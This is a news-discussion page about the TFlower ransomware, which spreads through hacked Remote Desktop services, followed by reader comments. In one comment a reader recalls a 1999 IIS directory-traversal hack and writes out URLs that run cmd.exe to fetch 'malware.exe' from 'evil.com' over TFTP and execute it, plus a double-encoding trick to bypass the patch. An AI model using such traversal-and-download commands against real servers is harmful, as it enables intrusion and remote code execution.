Stories
Slash Boxes
Comments

SoylentNews is people

posted by Fnord666 on Friday September 20 2019, @09:27AM   Printer-friendly
from the latest-and-greatest? dept.

Submitted via IRC for SoyCow2718

TFlower Ransomware - The Latest Attack Targeting Businesses

The latest ransomware targeting corporate environments is called TFlower and is being installed on networks after attackers hack into exposed Remote Desktop services.

With the huge payments being earned by ransomware developers as they target businesses and government agencies, it is not surprising to see new ransomware being developed to take advantage of this surge in high ransoms.

Such is the case with the TFlower ransomware, which was discovered in the wild in early August. At the time it was just thought to be another generic ransomware, but sources who have performed incident response involving this ransomware have told BleepingComputer that its activity is beginning to pick up.

TFlower is being installed in a corporate network through exposed Remote Desktop services that are being hacked by attackers.

Once the attackers gain access to the machine, they will infect the local machine or may attempt to traverse the network through tools such as PowerShell Empire, PSExec, etc.

When executed, the ransomware will display a console that shows the activity being performed by the ransomware while it is encrypting a computer.

[...] When done encrypting a computer, it will send another status update to the C2 in the form of:

https://www.domain.com/wp-includes/wp-merge.php?name=[computer_name]&state=success%20[encrypted_file_count],%20retry%20[retried_file_count]

Victims will now find a ransom notes named !_Notice_!.txt placed throughout the computer and on the Windows Desktop. This ransom note will instruct victims to contact the flower.harris@protonmail.com or flower.harris@tutanota.com email addresses for payment instructions.

It is not known how much the ransom amounts are at this time.

TFlower is still being researched, so it is not known at this time if there are any weaknesses in the encryption that could allow a user to get their files back for free.


Original Submission

This discussion has been archived. No new comments can be posted.
Display Options Threshold/Breakthrough Mark All as Read Mark All as Unread
The Fine Print: The following comments are owned by whoever posted them. We are not responsible for them in any way.
(1)
  • (Score: 2, Informative) by Anonymous Coward on Friday September 20 2019, @09:31AM (4 children)

    by Anonymous Coward on Friday September 20 2019, @09:31AM (#896439)

    malware runs on windoze.

    • (Score: 5, Funny) by Rosco P. Coltrane on Friday September 20 2019, @10:42AM (3 children)

      by Rosco P. Coltrane (4757) on Friday September 20 2019, @10:42AM (#896449)

      If you Linux folks don't want to feel left out and want to experience the full Windows Experience[tm] too, you can always place a notice.txt file on your desktop yourself and send a voluntary payment to Flower Harris.

      • (Score: 0) by Anonymous Coward on Friday September 20 2019, @10:58AM

        by Anonymous Coward on Friday September 20 2019, @10:58AM (#896450)

        What if my window manager does not support a desktop? Checkmate :^)

      • (Score: 2) by DannyB on Friday September 20 2019, @02:29PM (1 child)

        by DannyB (5839) Subscriber Badge on Friday September 20 2019, @02:29PM (#896498) Journal

        What about machines that feel left out because they have no GUI? No Widow Mangler?

        If I install systemd and other Potteringware, will I feel less left out?

        --
        People today are educated enough to repeat what they are taught but not to question what they are taught.
        • (Score: 3, Informative) by Freeman on Friday September 20 2019, @02:59PM

          by Freeman (732) on Friday September 20 2019, @02:59PM (#896513) Journal

          If I install systemd and other Potteringware, will I feel less left out?

          Yes, you will.

          What about machines that feel left out because they have no GUI? No Widow Mangler?

          I dunno, maybe Bot will chime in.

          --
          Joshua 1:9 "Be strong and of a good courage; be not afraid, neither be thou dismayed: for the Lord thy God is with thee"
  • (Score: 2) by DannyB on Friday September 20 2019, @03:02PM (2 children)

    by DannyB (5839) Subscriber Badge on Friday September 20 2019, @03:02PM (#896516) Journal

    Microsoft Vulnerability Memories from 1999.

    Before I used Java. Just getting started learning Linux. But primarily working with several Microsoft technologies. (VB, VFP, COM, ODBC, etc)

    I got this new project dumped in my lap. Microsoft was sponsoring an interoperability project and my company was one of the volunteer participants. This was my first introduction to async message queueing / pub-sub delivery systems.

    Flaming hoops I had to jump through:
    1. Separate (decently speced) server box fully set up with Windows NT 4.0.
    2. Then install a number of pre-requisite standard MS packages to support...
    3. Install the prototype server software.
    4. Modify my employer's product to interoperate with this server and exchange messages with it.
    5. Test it all out. Package it all up. Fly to facility in NY with other participants for proof of concept. (Just to be paranoid, I took a development system, source code, and the kitchen SYNC, etc) BTW, our product worked with this.

    One more aside: Items 1, and also 2 took an astonishing number of reboots. It was almost as if you had to reboot after you did nothing more than drawing your next breath. Now you need to reboot. Do some simple step. Oh, and now reboot! And just because you rebooted, you should now reboot again please. SuSE Linux 5.1 was astonishing in that you booted from a CD ROM, installed the system, and then with ZERO reboots, you had a Linux system up and fully operational -- from the kernel that had started from the CD-ROM boot. The entire installation process including swaping in additional CD-ROMs had run from the initramfs preboot thingy.

    Now to the point:

    I had an NT 4.0 server at my disposal. Let's see how amazingly secure IIS really is!

    (oh, boy, get ready . . . )

    I don't remember the exact path from so long ago, but the root of the http server was something like: C:\inetpub\wwwroot, or some such thing.

    So I could use a URL like: http://10.xx.yy.zz/../../windows/system32/cmd.exe [xx.yy.zz] -c tftp.exe evil.com malware.exe

    Then I could use a URL like: http://10.xx.yy.zz/../../windows/system32/cmd.exe [xx.yy.zz] -c malware.exe

    Windoze NT 4.0 included a handy-dandy tool called TFTP. This required me to set up my own TFTP server at "evil.com" with a sample program compiled from VB renamed to malware.exe. (more hoops to jump through)

    But naturally, the box was trivially hackable, right out of the box, freshly installed and fully updated! (and re-re-rebooted)

    Later on, Microsoft "fixed" this. My hack wouldn't work anymore. Ah, but I could now use:

    http://10.xx.yy.zz/%2E%2E/%2E%2E/widows/system32/cmd.exe [xx.yy.zz] -c tftp.exe evil.com malware.exe

    So later, Microsoft "fixed" this. Ah, but IIS handed the pathname right up to the file system. So what I could to is a 2nd level of escaping such that

    % is replaced by %25
    2 is replaced by %32
    E is replaced by %45

    I'm not going to rewrite the longer URL here. But once IIS thought the URL looks save, it dutifully escapes the first level of %XX characters, hands the pathname up to the file system, which then dutifully decodes the 2nd level of % escaping, letting me still download and install my "malware" program compiled in VB as proof of concept.

    I showed all of this to a coworker just to demonstrate how badly broken Microsoft junk really is.

    --
    People today are educated enough to repeat what they are taught but not to question what they are taught.
  • (Score: 0) by Anonymous Coward on Saturday September 21 2019, @11:35AM

    by Anonymous Coward on Saturday September 21 2019, @11:35AM (#896784)

    I always add this emails to spam lists:

    flower.harris@protonmail.com

    flower.harris@tutanota.com

(1)